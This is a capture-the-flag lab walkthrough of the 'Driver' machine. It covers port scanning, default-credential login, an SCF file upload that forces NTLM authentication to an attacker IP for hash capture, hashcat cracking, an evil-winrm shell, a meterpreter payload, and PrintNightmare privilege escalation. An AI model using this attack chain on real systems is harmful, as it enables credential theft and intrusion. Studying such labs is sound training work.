Driver
Enumeration
Nmap
First, let's scan for open ports using nmap
. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
. Then, we can scan those specific ports in depth by running nmap
's built-in scripts: nmap -p$ports -sC -sV 10.10.11.106
.
Port 80
80
Going to the website on port 80 gives an HTTP authentication dialogue box. Using the credentials admin:admin
to sign in works. There is a fw_up.php
page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.
A directory bruteforce scan reveals nothing: ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ
.
Port 5985
(WinRM)
5985
(WinRM)Port 135
(Samba)
135
(Samba)Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will use the contents of that file. We can create an SCF file like this:
We can set X.X.X.X
to our attacker's ip address. Since the IconFile
field is set to a UNC path, Windows will request the icon from the attacker and try authenticating with the user's credentials, then the attack will issue a challenge request, finally Windows will return a challenge response with the NTLM hash.
Foothold
Then, we upload the following SCF file using the firmware upload page (fw_up.php
) on port 80.
Responder outputs the following:
We have our NTLM hash!
Cracking the NTLM Hash
We can crack this hash with hashcat
. We first find the hashcat
mode needed for NTLMv2 hashes with hashcat --help | grep NTLMv2
, which shows us the correct mode is 5600
.
So, we paste the hash into a file called hash
and then run hashcat
with hashcat -a 0 -m 5600 hash rockyou.txt
:
The password is liltony
.
Evil WinRM
We get a shell on the machine! Now, we can get the user.txt
flag with cat ..\Desktop\user.txt
.
Privilege Escalation
To get a metasploit shell run the following on the attacker:
Then, through evil-winrm
on the target run: upload e.exe
and then .\e.exe
.
Then, back in the meterpreter, run background
to get mack the the msf
console. Then run use post/multi/recon/local_exploit_suggester
and set the session with set session 1
then run
to get a list of possible exploits. This reveals nothing.
So, the actual exploit that should be used is CVE-2021-1675
/CVE-2021-34527
, or PrintNightmare. After enough searching one may find this exploit because the spoolsv
service is running as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running ps
):
Originally, I saw the [!] failed to get current driver list
error message, but after resetting the box it worked:
Now, all we have to do is connect with evil-winrm
as our newly created administrator john
user: evil-winrm -u john -p SuperSecure -i 10.10.11.106
. We can get the root.txt
flag with cat C:\Users\Administrator\Desktop\root.txt
.
Last updated
Was this helpful?